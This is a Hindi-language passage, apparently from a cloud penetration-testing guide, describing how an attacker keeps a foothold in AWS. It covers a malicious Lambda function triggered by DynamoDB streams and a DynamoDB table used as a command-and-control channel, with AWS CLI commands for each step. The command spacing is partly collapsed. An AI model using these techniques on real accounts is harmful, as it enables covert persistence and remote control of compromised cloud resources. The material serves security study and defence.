DynamoDB ट्रिगर्स का उपयोग करते हुए, एक हमलावर एक टेबल के साथ एक दुर्भावनापूर्ण Lambda फंक्शन को जोड़कर एक गुप्त बैकडोर बना सकता है। Lambda फंक्शन को ट्रिगर किया जा सकता है जब कोई आइटम जोड़ा, संशोधित, या हटाया जाता है, जिससे हमलावर AWS खाते के भीतर मनमाने कोड को निष्पादित कर सकता है।
# Create a malicious Lambda functionawslambdacreate-function \--function-name MaliciousFunction \--runtime nodejs14.x \--role <LAMBDA_ROLE_ARN> \--handler index.handler \--zip-file fileb://malicious_function.zip \--region <region># Associate the Lambda function with the DynamoDB table as a triggerawsdynamodbstreamsdescribe-stream \--table-name TargetTable \--region <region># Note the "StreamArn" from the outputawslambdacreate-event-source-mapping \--function-name MaliciousFunction \--event-source <STREAM_ARN> \--region <region>
पर्सिस्टेंस बनाए रखने के लिए, हमलावर DynamoDB टेबल में आइटम्स को बना सकता है या मॉडिफाई कर सकता है, जिससे मलिशस Lambda फंक्शन ट्रिगर होगा। इससे हमलावर को AWS अकाउंट के भीतर कोड एक्जीक्यूट करने की अनुमति मिलती है बिना Lambda फंक्शन के सीधे इंटरैक्शन के।
DynamoDB को C2 चैनल के रूप में
हमलावर DynamoDB टेबल का उपयोग कमांड एंड कंट्रोल (C2) चैनल के रूप में कर सकता है, आइटम्स बनाकर जिसमें कमांड्स होते हैं और समझौता किए गए इंस्टेंसेस या Lambda फंक्शन्स का उपयोग करके इन कमांड्स को फेच करने और एक्जीक्यूट करने के लिए।
# Create a DynamoDB table for C2awsdynamodbcreate-table \--table-name C2Table \--attribute-definitions AttributeName=CommandId,AttributeType=S \--key-schema AttributeName=CommandId,KeyType=HASH \--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \--region <region># Insert a command into the tableawsdynamodbput-item \--table-name C2Table \--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \--region <region>
समझौता किए गए उदाहरण या Lambda फ़ंक्शन्स नियमित रूप से C2 टेबल को नए कमांड्स के लिए जांच सकते हैं, उन्हें निष्पादित कर सकते हैं, और वैकल्पिक रूप से परिणामों को वापस टेबल में रिपोर्ट कर सकते हैं। यह हमलावर को समझौता किए गए संसाधनों पर निरंतरता और नियंत्रण बनाए रखने की अनुमति देता है।